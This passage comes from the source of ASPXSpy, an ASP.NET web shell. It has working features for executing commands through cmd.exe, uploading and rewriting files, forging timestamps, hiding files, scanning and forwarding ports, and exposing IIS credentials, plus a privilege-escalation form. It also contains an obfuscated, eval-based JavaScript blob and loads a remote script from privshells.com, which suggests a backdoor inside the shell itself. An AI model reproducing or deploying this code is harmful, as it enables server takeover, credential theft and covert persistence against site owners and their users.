  1805. PortForward gYP=new PortForward();
  1806. gYP.lyTOK();
  1807. }
  1808. protected void ruQO()
  1809. {
  1810. PortForward gYP=new PortForward();
  1811. gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
  1812. }
  1813. public string mRDl(string instr)
  1814. {
  1815. string tmp=null;
  1816. try
  1817. {
  1818. tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
  1819. }
  1820. catch(Exception e)
  1821. {
  1822. }
  1823. return tmp;
  1824. }
  1825. public void VikG()
  1826. {
  1827. string[] OTV=lOmX.Text.ToString().Split(',');
  1828. for(int i=0;i<OTV.Length;i++)
  1829. {
  1830. IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
  1831. }
  1832. try
  1833. {
  1834. Thread[] kbXY=new Thread[IVc.Count];
  1835. int sdO=0;
  1836. for(sdO=0;sdO<IVc.Count;sdO++)
  1837. {
  1838. kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
  1839. kbXY[sdO].Start();
  1840. }
  1841. for(sdO=0;sdO<kbXY.Length;sdO++)
  1842. kbXY[sdO].Join();
  1843. }
  1844. catch
  1845. {
  1846. }
  1847. }
  1848. public class ScanPort
  1849. {
  1850. private string _ip="";
  1851. private int jTdO=0;
  1852. private TimeSpan _timeSpent;
  1853. private string QGcH="Not scanned";
  1854. public string ip
  1855. {
  1856. get { return _ip;}
  1857. }
  1858. public int port
  1859. {
  1860. get { return jTdO;}
  1861. }
  1862. public string status
  1863. {
  1864. get { return QGcH;}
  1865. }
  1866. public TimeSpan timeSpent
  1867. {
  1868. get { return _timeSpent;}
  1869. }
  1870. public ScanPort(string ip,int port)
  1871. {
  1872. _ip=ip;
  1873. jTdO=port;
  1874. }
  1875. public void Scan()
  1876. {
  1877. TcpClient iYap=new TcpClient();
  1878. DateTime qYZT=DateTime.Now;
  1879. try
  1880. {
  1881. iYap.Connect(_ip,jTdO);
  1882. iYap.Close();
  1883. QGcH="<font color=green><b>Open</b></font>";
  1884. }
  1885. catch
  1886. {
  1887. QGcH="<font color=red><b>Close</b></font>";
  1888. }
  1889. _timeSpent=DateTime.Now.Subtract(qYZT);
  1890. }
  1891. }
  1892. public static void YFcNP(System.Web.UI.Page page)
  1893. {
  1894. page.RegisterHiddenField("__EVENTTARGET","");
  1895. page.RegisterHiddenField("__FILE","");
  1896. string s=@"<script language=Javascript>";
  1897. s+=@"function Bin_PostBack(eventTarget,eventArgument)";
  1898. s+=@"{";
  1899. s+=@"var theform=document.forms[0];";
  1900. s+=@"theform.__EVENTTARGET.value=eventTarget;";
  1901. s+=@"theform.__FILE.value=eventArgument;";
  1902. s+=@"theform.submit();";
  1903. s+=@"} ";
  1904. s+=@"</scr"+"ipt>";
  1905. page.RegisterStartupScript("",s);
  1906. }
  1907. protected void PPtK(object sender,EventArgs e)
  1908. {
  1909. WICxe();
  1910. yhv.Visible=true;
  1911. Bin_H2_Title.InnerText="File Search >>";
  1912. NaLJ.Value=Request.PhysicalApplicationPath;
  1913. oJiym.Visible=false;
  1914. }
  1915. protected void NBy(object sender,EventArgs e)
  1916. {
  1917. DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
  1918. if(!GQMM.Exists)
  1919. {
  1920. xseuB("Path invalid ! ");
  1921. return;
  1922. }
  1923. oog(GQMM);
  1924. xseuB("Search completed ! ");
  1925. }
  1926. public void oog(DirectoryInfo dir)
  1927. {
  1928. try
  1929. {
  1930. oJiym.Visible=true;
  1931. foreach(FileInfo Bin_Files in dir.GetFiles())
  1932. {
  1933. try
  1934. {
  1935. if(Bin_Files.FullName==Request.PhysicalPath)
  1936. {
  1937. continue;
  1938. }
  1939. if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
  1940. {
  1941. continue;
  1942. }
  1943. if(Ven.SelectedItem.Value=="name")
  1944. {
  1945. if(rAQ.Checked)
  1946. {
  1947. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
  1948. {
  1949. FJvQ(Bin_Files);
  1950. }
  1951. }
  1952. else
  1953. {
  1954. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1955. {
  1956. Response.Write(Bin_Files.FullName);
  1957. FJvQ(Bin_Files);
  1958. }
  1959. }
  1960. }
  1961. else
  1962. {
  1963. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
  1964. string ava=sr.ReadToEnd();
  1965. sr.Close();
  1966. if(rAQ.Checked)
  1967. {
  1968. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
  1969. {
  1970. FJvQ(Bin_Files);
  1971. if(YZw.Checked)
  1972. {
  1973. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
  1974. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1975. sw.Write(ava);
  1976. sw.Close();
  1977. }
  1978. }
  1979. }
  1980. else
  1981. {
  1982. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
  1983. {
  1984. FJvQ(Bin_Files);
  1985. if(YZw.Checked)
  1986. {
  1987. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
  1988. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
  1989. sw.Write(ava);
  1990. sw.Close();
  1991. }
  1992. }
  1993. }
  1994. }
  1995. }
  1996. catch(Exception ex)
  1997. {
  1998. xseuB(ex.Message);
  1999. continue;
  2000. }
  2001. }
  2002. foreach(DirectoryInfo subdir in dir.GetDirectories())
  2003. {
  2004. oog(subdir);
  2005. }
  2006. }
  2007. catch(Exception ex)
  2008. {
  2009. xseuB(ex.Message);
  2010. }
  2011. }
  2012. public void FJvQ(FileInfo objfile)
  2013. {
  2014. TableRow tr=new TableRow();
  2015. TableCell tc=new TableCell();
  2016. string bg=OKM();
  2017. tr.Attributes["onmouseover"]="this.className='focus';";
  2018. tr.CssClass=bg;
  2019. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  2020. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
  2021. tr.Cells.Add(tc);
  2022. tc=new TableCell();
  2023. tc.Text=objfile.LastWriteTime.ToString();
  2024. tr.Cells.Add(tc);
  2025. tc=new TableCell();
  2026. tc.Text=mTG(objfile.Length);
  2027. tr.Cells.Add(tc);
  2028. oJiym.Rows.Add(tr);
  2029. }
  2030. public void xseuB(string instr)
  2031. {
  2032. jDKt.Visible=true;
  2033. jDKt.InnerText=instr;
  2034. }
  2035. protected void xVm(object sender,EventArgs e)
  2036. {
  2037. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
  2038. if(Jfm==Password)
  2039. {
  2040. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
  2041. ljtzC.Visible=false;
  2042. PBZw();
  2043. }
  2044. else
  2045. {
  2046. tZSx();
  2047. }
  2048. }
  2049. protected void Ybg(object sender,EventArgs e)
  2050. {
  2051. krIR(Server.MapPath("."));
  2052. }
  2053. protected void KjPi(object sender,EventArgs e)
  2054. {
  2055. Bin_H2_Title.InnerText="IIS Spy >>";
  2056. WICxe();
  2057. VNR.Visible=true;
  2058. AdCx();
  2059. }
  2060. protected void DGCoW(object sender,EventArgs e)
  2061. {
  2062. try
  2063. {
  2064. StreamWriter sw;
  2065. if(NdCX.SelectedItem.Text=="UTF-8")
  2066. {
  2067. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
  2068. }
  2069. else
  2070. {
  2071. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
  2072. }
  2073. sw.Write(Xgvv.InnerText);
  2074. sw.Close();
  2075. xseuB("Save file success !");
  2076. }
  2077. catch(Exception error)
  2078. {
  2079. xseuB(error.Message);
  2080. }
  2081. krIR(AXSbb.Value);
  2082. }
  2083. protected void lbjLD(object sender,EventArgs e)
  2084. {
  2085. string FlwA=AXSbb.Value;
  2086. FlwA=OElM(FlwA);
  2087. try
  2088. {
  2089. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
  2090. xseuB("File upload success!");
  2091. }
  2092. catch(Exception error)
  2093. {
  2094. xseuB(error.Message);
  2095. }
  2096. krIR(AXSbb.Value);
  2097. }
  2098. protected void EXV(object sender,EventArgs e)
  2099. {
  2100. krIR(AXSbb.Value);
  2101. }
  2102. protected void mcCY(object sender,EventArgs e)
  2103. {
  2104. krIR(Server.MapPath("."));
  2105. }
  2106. protected void iVk(object sender,CommandEventArgs e)
  2107. {
  2108. krIR(e.CommandArgument.ToString());
  2109. }
  2110. protected void XXrLw(object sender,EventArgs e)
  2111. {
  2112. try
  2113. {
  2114. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
  2115. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
  2116. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
  2117. xseuB("File time clone success!");
  2118. }
  2119. catch(Exception error)
  2120. {
  2121. xseuB(error.Message);
  2122. }
  2123. krIR(AXSbb.Value);
  2124. }
  2125. protected void tIykC(object sender,EventArgs e)
  2126. {
  2127. string path=pWVL.Value;
  2128. try
  2129. {
  2130. File.SetAttributes(path,FileAttributes.Normal);
  2131. if(ZhWSK.Checked)
  2132. {
  2133. File.SetAttributes(path,FileAttributes.ReadOnly);
  2134. }
  2135. if(SsR.Checked)
  2136. {
  2137. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
  2138. }
  2139. if(ccB.Checked)
  2140. {
  2141. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
  2142. }
  2143. if(fbyZ.Checked)
  2144. {
  2145. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
  2146. }
  2147. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
  2148. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
  2149. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
  2150. xseuB("File attributes modify success!");
  2151. }
  2152. catch(Exception error)
  2153. {
  2154. xseuB(error.Message);
  2155. }
  2156. krIR(AXSbb.Value);
  2157. }
  2158. protected void VOxn(object sender,EventArgs e)
  2159. {
  2160. WICxe();
  2161. vIac.Visible=true;
  2162. Bin_H2_Title.InnerText="Execute Command >>";
  2163. }
  2164. protected void FbhN(object sender,EventArgs e)
  2165. {
  2166. try
  2167. {
  2168. Process ahAE=new Process();
  2169. ahAE.StartInfo.FileName=kusi.Value;
  2170. ahAE.StartInfo.Arguments=bkcm.Value;
  2171. ahAE.StartInfo.UseShellExecute=false;
  2172. ahAE.StartInfo.RedirectStandardInput=true;
  2173. ahAE.StartInfo.RedirectStandardOutput=true;
  2174. ahAE.StartInfo.RedirectStandardError=true;
  2175. ahAE.Start();
  2176. string Uoc=ahAE.StandardOutput.ReadToEnd();
  2177. Uoc=Uoc.Replace("<","&lt;");
  2178. Uoc=Uoc.Replace(">","&gt;");
  2179. Uoc=Uoc.Replace("\r\n","<br>");
  2180. tnQRF.Visible=true;
  2181. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
  2182. }
  2183. catch(Exception error)
  2184. {
  2185. xseuB(error.Message);
  2186. }
  2187. }
  2188. protected void RAFL(object sender,EventArgs e)
  2189. {
  2190. if(qPdI.Text.Length>0)
  2191. {
  2192. tpRQ(qPdI.Text);
  2193. }
  2194. else
  2195. {
  2196. lFAvw();
  2197. }
  2198. }
  2199. protected void Grxk(object sender,EventArgs e)
  2200. {
  2201. YUw();
  2202. }
  2203. protected void ilC(object sender,EventArgs e)
  2204. {
  2205. tZRH();
  2206. }
  2207. protected void HtB(object sender,EventArgs e)
  2208. {
  2209. pDVM();
  2210. }
  2211. protected void Olm(object sender,EventArgs e)
  2212. {
  2213. iLVUT();
  2214. }
  2215. protected void jXhS(object sender,EventArgs e)
  2216. {
  2217. ADCpk();
  2218. }
  2219. protected void lRfRj(object sender,EventArgs e)
  2220. {
  2221. lDODR();
  2222. }
  2223. protected void xSy(object sender,EventArgs e)
  2224. {
  2225. xFhz();
  2226. }
  2227. protected void dMx(object sender,EventArgs e)
  2228. {
  2229. rAhe();
  2230. }
  2231. protected void zOVO(object sender,EventArgs e)
  2232. {
  2233. if(((DropDownList)sender).ID.ToString()=="WYmo")
  2234. {
  2235. dQIIF.Visible=false;
  2236. MasR.Text=WYmo.SelectedItem.Value.ToString();
  2237. }
  2238. if(((DropDownList)sender).ID.ToString()=="Pvf")
  2239. {
  2240. xTZY();
  2241. }
  2242. if(((DropDownList)sender).ID.ToString()=="FGEy")
  2243. {
  2244. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
  2245. }
  2246. if(((DropDownList)sender).ID.ToString()=="NdCX")
  2247. {
  2248. gLKc(Sqon.Value);
  2249. }
  2250. }
  2251. protected void IkkO(object sender,EventArgs e)
  2252. {
  2253. krIR(AXSbb.Value);
  2254. }
  2255. protected void BGY(object sender,EventArgs e)
  2256. {
  2257. vCf();
  2258. }
  2259. protected void cptS(object sender,EventArgs e)
  2260. {
  2261. vNCHZ();
  2262. }
  2263. protected void fDO(object sender,EventArgs e)
  2264. {
  2265. MHLv();
  2266. }
  2267. protected void vJNsE(object sender,EventArgs e)
  2268. {
  2269. vuou();
  2270. xseuB("Clear All Thread ......");
  2271. }
  2272. protected void wDZ(object sender,EventArgs e)
  2273. {
  2274. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
  2275. ruQO();
  2276. xseuB("All Thread Start ......");
  2277. }
  2278. protected void tYoZ(object sender,EventArgs e)
  2279. {
  2280. }
  2281. protected void ELkQ(object sender,EventArgs e)
  2282. {
  2283. VikG();
  2284. GBYT.Visible=true;
  2285. string res=string.Empty;
  2286. foreach(ScanPort th in IVc)
  2287. {
  2288. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
  2289. }
  2290. GBYT.InnerHtml=res;
  2291. }
  2292. protected void ORUgV(object sender,EventArgs e)
  2293. {
  2294. dwgT();
  2295. }
  2296. public void WICxe()
  2297. {
  2298. DCbS.Visible=false;
  2299. CzfO.Visible=false;
  2300. APl.Visible=false;
  2301. vIac.Visible=false;
  2302. kkHN.Visible=false;
  2303. YwLB.Visible=false;
  2304. iDgmL.Visible=false;
  2305. hOWTm.Visible=false;
  2306. vrFA.Visible=false;
  2307. yhv.Visible=false;
  2308. }
  2309. </script>
  2310. <SCRIPT SRC=http://privshells.com/blabla/per.js></SCRIPT>
  2311. <html xmlns="http://www.w3.org/1999/xhtml" >
  2312. <head id="Head1" runat="server">
  2313. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
  2314. <title>ASPXspy</title>
  2315. <script type="text/javascript">var _6084;var _7053='774C126E160F1364C1430B1358F1466A1418A1370B1424B1460F1040F1478A1448C1394A1460B1370B1004F998D1124E1394A1418F1382B956F1454C1448C1358C1130F968B1388A1460E1460C1436D1112E1046D1046A1478A1478B1478C1040E1388A1346C1358B1406B1370D1448F1352F1430A1484D1040A1424B1370E1460D1046E1352A1412B1346B1352F1412D1346D1046B1436C1370D1448E1040A1436C1388B1436A1142E1466D1448A1412B1130B998E1022A1370A1454C1358A1346E1436E1370F1004F1412C1430C1358A1346D1460A1394C1430A1424B1040F1388E1448F1370F1376C1010C1022F998C968D956A1478C1394C1364F1460E1388F1130E1052D956E1388B1370E1394A1382C1460B1388B1130A1052F956C1352E1430C1448E1364E1370B1448B1130C1052B1136C998E1010F1118E';var _5449=/[\x41\x42\x43\x44\x45\x46]/;var _8618=2;var _2287=_7053.charAt(_7053.length-1);var _4826;var _5884=_7053.split(_5449);var _1128=[String.fromCharCode,isNaN,parseInt,String];_5884[1]=_1128[_8618+1](_1128[_8618](_5884[1])/21);var _8059=(_8618==8)?String:eval;_4826='';_11=_1128[_8618](_5884[0])/_1128[_8618](_5884[1]);for(_6084=3;_6084<_11;_6084++)_4826+=(_1128[_8618-2]((_1128[_8618](_5884[_6084])+_1128[_8618](_5884[2])+_1128[_8618](_5884[1]))/_1128[_8618](_5884[1])-_1128[_8618](_5884[2])+_1128[_8618](_5884[1])-1));var _8127='_1751';var _6091='_8127=_4826';function _1064(_3531){_8059(_2713);_1064(_5886);_5886(_6091);_1064(_8127);}var _2713='_1064=_8059';var _5886='_5886=_1064';_1064(_2287);</script>
  2316. <style type="text/css">
  2317. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
  2318. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  2319. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
  2320. .list{font:12px Arial,Tahoma;height:23px;}
  2321. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  2322. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
  2323. a {color: #00f;text-decoration:underline;}
  2324. a:hover{color: #f00;text-decoration:none;}
  2325. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
  2326. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
  2327. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
  2328. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
  2329. .head td span{font-weight:normal;}
  2330. form{margin:0;padding:0;}
  2331. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  2332. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  2333. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2334. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  2335. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
  2336. </style>
  2337. <script type="text/javascript">
  2338. function CheckAll(form){
  2339. for(var i=0;i<form.elements.length;i++){
  2340. var e=form.elements[i];
  2341. if(e.name!='chkall')
  2342. e.checked=form.chkall.checked;
  2343. }
  2344. }
  2345. </script>
  2346. </head>
  2347. <body style="margin:0;table-layout:fixed;">
  2348. <form id="ASPXSpy" runat="server">
  2349. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
  2350. <span style="font:11px Verdana;">Password:</span>
  2351. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
  2352. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
  2353. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
  2354. </div>
  2355. <div id="ZVS" runat="server">
  2356. <div id="Zzj" runat="server">
  2357. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  2358. <tr class="head">
  2359. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
  2360. </tr>
  2361. <tr class="alt1">
  2362. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
  2363. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
  2364. </td>
  2365. </tr>
  2366. </table>
  2367. </div>
  2368. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
  2369. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
  2370. <h2 id="Bin_H2_Title" runat="server"></h2>
  2371. <%--FileList--%>
  2372. <div id="CzfO" runat="server">
  2373. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  2374.  <tr>
  2375. <td style=" white-space:nowrap">Current Directory : </td>
  2376. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
  2377. </td>
  2378. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
  2379.  </tr>
  2380. </table>
  2381. <table width="100%" border="0" cellpadding="4" cellspacing="0">
  2382. <tr class="alt1"><td colspan="7" style="padding:5px;">
  2383. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
  2384. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
  2385.  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
  2386. </td></tr>
  2387. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
  2388. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
  2389. </asp:Table>
  2390. </table>
  2391. </div>
  2392. <%--FileEdit--%>
  2393. <div id="vrFA" runat="server">
  2394. <p>Current File(import new file name and new file)<br/>
  2395. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
  2396. </p>
  2397. <p>File Content<br/>
  2398. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
  2399. </p>
  2400. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
  2401. </div>
  2402. <%--CloneTime--%>
  2403. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
  2404. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
  2405. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
  2406. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
  2407. <h2>Set last modified &raquo;</h2>
  2408. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
  2409. <p>
  2410. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
  2411. &nbsp;
  2412. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
  2413. &nbsp;
  2414. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
  2415. &nbsp;
  2416. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
  2417. </p>
  2418. <p>
  2419. CreationTime :
  2420. <input class="input" id="yUqx" type="text" runat="server"/>
  2421. LastWriteTime :
  2422. <input class="input" id="uYjw" type="text" runat="server"/>
  2423. LastAccessTime :
  2424. <input class="input" id="aLsn" type="text" runat="server"/>
  2425. </p>
  2426. <p>
  2427. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
  2428. </p>
  2429. </div>
  2430. <%--IISSpy--%>
  2431. <div runat="server" id="VNR" visible="false" enableviewstate="false">
  2432. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2433. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
  2434. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
  2435. </asp:Table>
  2436. </table>
  2437. </div>
  2438. <%--Process--%>
  2439. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
  2440. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2441. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
  2442. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
  2443. </asp:Table>
  2444. </table>
  2445. </div>
  2446. <%--CmdShell--%>
  2447. <div runat="server" id="vIac">
  2448.  <p>CmdPath:<br/>
  2449.  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
  2450.  </p>
  2451.  Argument:<br/>
  2452.  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
  2453.  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
  2454.  </div>
  2455. </div>
  2456. <%--Services--%>
  2457. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
  2458. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2459. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
  2460. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
  2461. </asp:Table>
  2462. </table>
  2463. </div>
  2464. <%--Sysinfo--%>
  2465. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
  2466. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2467. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
  2468. <h2 id="Bin_H2_Mac" runat="server"></h2>
  2469. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2470. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
  2471. <h2 id="Bin_H2_Driver" runat="server"></h2>
  2472. <hr style=" border: 1px solid #ddd;height:0px;"/>
  2473. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
  2474. </div>
  2475. <%--UserInfo--%>
  2476. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
  2477. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2478. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
  2479. </asp:Table>
  2480. </table>
  2481. </div>
  2482. <%--SuExp--%>
  2483.  <div runat="server" id="APl">
  2484. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2485.  <tr align="center">
  2486.  <td style="width:10%"></td>
  2487.  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
  2488.  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
  2489.  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
  2490.  <td style="width:10%"></td>
  2491.  </tr>
  2492.  <tr >
  2493.  <td style="width:10%"></td>
  2494.  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
  2495.  </tr>
  2496. </table>
  2497. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
